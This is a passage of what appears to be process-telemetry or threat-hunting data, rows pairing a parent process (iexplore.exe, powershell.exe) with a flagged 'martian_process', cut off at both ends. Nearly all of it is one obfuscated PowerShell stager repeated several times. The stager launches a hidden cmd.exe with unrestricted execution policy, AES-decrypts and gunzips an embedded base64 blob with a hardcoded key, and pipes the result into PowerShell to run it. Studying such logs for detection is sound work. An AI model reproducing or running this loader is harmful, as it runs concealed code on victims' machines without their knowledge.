A/Nq95bH/UFSw1bz724Sj5s7dsQtlHiq5jnKg+G5xhs71YJUzy4Qnn76gpq11VlmxMi8ylQGjCr1Ahzi1ELO4pnarQElXZsqSIINv9nEzl5ulKp9Jbn+EtA85csbB5p7mJtACPWok9a9TpZs/ZwdNwU7oVbYga65enge4QUTldLr0KdjY/3gd186lbzNzuTqrgZXgSymli7tEN6vMTMN/YLCb1Art+uPcM0Pra/GO6yMv7V0GH01Vdbby915wN5EBgTF1qnR82oY5UKnnTov/l3pgIzLdC0lV9147qgHtHdUQPuXPPjPeGb9t2xcw0+NVEBNGg3ZSNkC71pRpm2W99nD71yMw53Lm0uiJHhcTQw9Hz7tASGMtI5R0Ey88DpK43nvQA==';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - } |
parent_process | iexplore.exe | martian_process | powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - } | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = 'AAAAAAAAAAAAAAAAAAAAAPQl+JCOzpJjaCc4oUUtzD6dtRc5GeY13jTOOYnEVEw9/oEcTlImTTjV3Mz44W6BrbCgvmdbny1MHoQC5+rcpv+sFoXHM3PSehbBHZ2q1IJ8xPaB0q0JwnompfbTkfMVDiE/FBejZH/5RWv3ppRUB09vvxJTAeAvQKDGkEmJ1Aq4HS12m8rPu3v1uQCmZjsP5h1Hi74RrBIpmS+jmJYQRYL+TmPLAAAcY25bybixxvOTLUEz4vf195zo9OIWRYfu8cp26Dqymqh9elUnx0NRTnthnPVmGBJwFO8hNON3RnEP3tQLztYBw/vRUbvTkS77TPkponxnwG05WbkA+88LvgR2OLo0HG+2r7fd7pHeru0vl/qyGl0NB8ajPlq0aCJk9QJosD+3GzT4ZpldSvlGdN3+0BGxyCZBgvHlSwuOEPNSiqdqvSnZq7KgCKU0pc++xhN6blRNhL5gXfOk5AP80Id4FXOuWU80HCGS5CryabRDgmZH/r883LoZIGy+BKgfpEedvCuodGLtTii2aAAHZJBoyD/AcYgYHnNfck2hlTMAFtLs+od+5ow9kEbqARNVXtxn+rFENJnPmhSUQLLwgnN+8deC9CNJaLmANKSMTGJOJ9Pdrm7Z7Dk1L444+v+DzqpXQ9WlAMAKiZMSN1bAVkVZQv/Gla8I7ytIwf58fdPHRJCUERgdJDeg6G2z+zT10r1VDmPSUQBYwUlGO6TWQV5DZIgcjwxzYIZseM79fqqzDr3vS0dbgcYEI6cV4Bbd+1o4B4faQRobFRqzqQEI2HlohIdVcypQuafcoGBSjtOVVsU5sjiSVs0NNmFF2n16b28SGn8C5Vwftpq7JPmOW1CgHR548O34tqf3u3kmWe5ib/gZn5LYb+ZMpmXBHsgHla9uz+lZccTaViTVx23aCl24mulhn7FM09HVESgJO39Ke+WbA+76YoBTNvVZ/Pk4SxygfSxYdUySs7i5xAE/Dj+iroOh3AX3pM0ZtlZV7UcTQZCujIZ9qd/20vXN0pPGUV4Rj9FdRlQa4g5dgTuF58aM45wC5PmWabHXyNnLGAw2MUpgY7o0mmsyIvvyP0Wt6/l0q9eggKINSY2rldzM/CJRszOTv71Lo6egfKV6KJhojjVOOZmY9Ymw6xemtKuOGg+4iLIgzn+Aa6rZGCq5H9WHAkYdsMsSD/2kxiYHO7Id7o6OW0zDrF6c98u0NMrEQeyaAq2fMA00vsue9OIRhZeOSLxo+ziBQwVeNikTfTDOA7Dv2Wtm6BIL8iLZYhUMt4U0vAF69o0WneUjGRcaSWDXkR3Z2kgXxG9oeQjlForA4hx94KQeq6ZCRkkpg4QwN/pjBqpKtiiXOHeqMYVK6F6pURLu+NRK6/ulgXe4xxbEWInDSLHk9025b7LP6fsAvbIy7+8xQSEI1152lYJMk2Jj2LSwfkEA+oLZg9TBKToetYY6EKWfAQAc2p8dQyrmXau7yvSiJjNQ6OEYCoZ2RzCPuZtCApolqhfgOPn5eLQAQGnusW4RoNIhDhjkvGcrewSHkoAoNHG5D+CDt6AMOXiNyJtj9JaA+4csInsmsVBBUisp6j7+8WPXjWmKDCJ7sGEB+a+IVE08brSYnTfX8O7ChyoCIBHhZklWUw9RflJ8gTZbuxHQzPF4RQyJkJhwSLBU3WOlSMsXLWxrnbEU7uZUPvpYfddR8+lMADP9K50l5Vh0a3Mo9vzR9cYjLBBOgpOxf8jB78ASWE9gLq2Ub40qjpnc3/D/KYsS44HUk6VaQAZXk5K5kAYuT4kNpPUAyZCSlWbgKMaRuIxkd8LuTPht8zYSt+6tXrc7ZHvX+vL50MsI8suCiXEvypm1VEYdvCIc1jw5ad7jkiC/pn9lRInSC/Y3wuzwh+MwXXbuNsylJLxiWtwNEk2tEmacofNZ6DQbhupSwMhcFWAsJEGCFQw3wJwyg+IGQBvBDoCiyhGLbEH+X0TddOSRtGEX5JWtW2Ez4cOtYxUE1r0mqtLXcfDuxwHFvM6aUFHRkXjWRvFUb9zx/dB7D+M/KPLPpavZSUU1LJqXx0j5pLApvp4zdW3UmWR+svsRf01mvQ3f8lgdCWnTjHJiwBDX07MazuPNjjLiNoGTbfcuN8xIc1zpDt/9j/67kZ2AMInF6HhkYOlcqw+cSi6KaMqxAdIEdufoqKGPuF9IgFRDATIn475aTFeZdbwF/VZJWWp5ejTrsb4qA7kSZnCmBeXTENgklcbMAsZc//FU7WolOGsTACF0OVvvvX51bN2gbZ3VafX/804aICkQylZrenIBNzFLYhUVOiSHZoEBnY12vt1v6edtHQlOqtLVRcNeLEIpDeSBjTF77fd9fEFI9hqbZygTH5ihLAsBpnsFyngXXyVlCO7MRzNs9PC2iqfww7hC/mV3tYhAjuYevpTp7b67oBPrgdEa36IlcaSE+nUlsir8Mq+wSx6LVnpdQHBQ4kF1xDSJaW5y0Eo3hBmM1J6AwcC5vAMMaNR6pd3RXQJRoVocn5ObUg6q+f2mNrapva3jeb5pIKk5GLyKHElULazWRlXaV02s2V0sGdUBaaM/67tD0VAoWMrNEnjL6ImfI2wuzKeLaxZE/GTuzks7um0jVxDu42c3mrvqGJn+KqiHOHYpah+0f7ZEN/+hj+PTzLUaC2mWVO9Wqzypls5w7UlvzN9bvQJRKWD4s5H9xjy19itsJwchp4WI4Z56oBqaBr75YDcEJuZ52OSZNdWCGATrgjaAYoFveWKoLYO+CVoe6ur/BjxIsVFkbihcMCz713ii0B4pPj+j9GwjuSYhMQPz3Gvjxe6t6kyJahYTh3MoJbLBpTmdWN4IUzXXyWmLBRXAJvN2/XPgzAkWL9GxxfjZd8iqgZVS32nKV8gvnhfVcf4zq3Hf7+OXM0t8Q7VojcuKgVZv0T9GezIQ7pGKBmh6j4LF2AQsyigPyvBWbhXVhTYXSPcAN701ZO7VAWJXn01F1knjEXcA2xIUy7yTx4X5XvY9Ic8B+WrFVnYAmeETknas0YjPJDNKgrU2ZZkDCY16AaXfB+4TVmx9EHFFSVRLFuBYUZ107thxonxzGWE8EmlGzrbg12z2s5IUOXVPZAnir8WfAYRjgTf6yXKoAZraJmEQE7yuzfMqfxYzhkWmNhTQMZ18ez3/USbDmLw4m30V1xHMW+m/GUovmPguRvO9df8eMs0NsZbVJyZ83z2tEL884DHKoIPAoPr86mPdCCW3TS3jYlZfSE2OZYrhhURmStTn4azcFWiW7vOpujNrW4WHXCwbHv65ol1pHmx7rmR0vNeK27chWrruid3JS/eoB0OoE5VVE4OIaCMi7bS0Ll5DcPbhKN/93elO8BNIhHN86dS7RLGnwyrnTHJfGh1TFpyANUEpFA+Aesef6m2wZEa6g1Qu6d67IoyStZaRB7bd1CgCrsTgfbMwJ9FIjXtYeRC2TJyxcHk9925PNj3F4Bc+A5Q4HY+SGZt3nG+2LklMKCR8IlQEcd2V//ObPJ/FWSLv5SPaQ+vQRP8t82R+O3/M2YH5sLSY6hXz22jZjhPOQ56PLx69brVCxFgFPIQruDzGCQunvzpBlp+cMMhxeZLip0CISOowibI+frniOn4VanN7nyQoiPBjKLUqKE1dGsJ8HTMMg8t7uElwm1Z8gOTkATSKAnYyK+pIZeBsbePIL4KtXj1S7dN5dSVlNhlzKsGbWPu9WdHoq1JrgD2DlT//iOdf0ILsfXJDJTlmDTADd0B2MvcrxoRNKCZMicJoznw3cWYeGUUOxqwvQZIxdnYrnGKqLt7JbSbGkfokf+ixbpQVDvzI2/cIYnJ7ZIfdwTbjuWmfBBB5tiu6t4dWXrPCuGgSsUXESsGRDhWNFTUTFLlkVfHbc4GX0TwPGvshqA8rQR6abELMA2e7ejEX+AtKSQW4dbQkTwJiLNL3uYMRKgmnHg3TIn86tYgBTuf9pnj/DIZNw2ZA6YnK3Sbxjb2Q3lz03Dtw63TMR39iBlnjroZakPQz4mggFrkN6am6DF9C0YDkAeO8GErbbZcvTLPkpvsc/vTvoNcS5OUI+kwS2Ix0N57sEf0acciB537tGSuwA/Nq95bH/UFSw1bz724Sj5s7dsQtlHiq5jnKg+G5xhs71YJUzy4Qnn76gpq11VlmxMi8ylQGjCr1Ahzi1ELO4pnarQElXZsqSIINv9nEzl5ulKp9Jbn+EtA85csbB5p7mJtACPWok9a9TpZs/ZwdNwU7oVbYga65enge4QUTldLr0KdjY/3gd186lbzNzuTqrgZXgSymli7tEN6vMTMN/YLCb1Art+uPcM0Pra/GO6yMv7V0GH01Vdbby915wN5EBgTF1qnR82oY5UKnnTov/l3pgIzLdC0lV9147qgHtHdUQPuXPPjPeGb9t2xcw0+NVEBNGg3ZSNkC71pRpm2W99nD71yMw53Lm0uiJHhcTQw9Hz7tASGMtI5R0Ey88DpK43nvQA==';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - } | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\system32\cmd.exe" /c powershell.exe $YmgBp = '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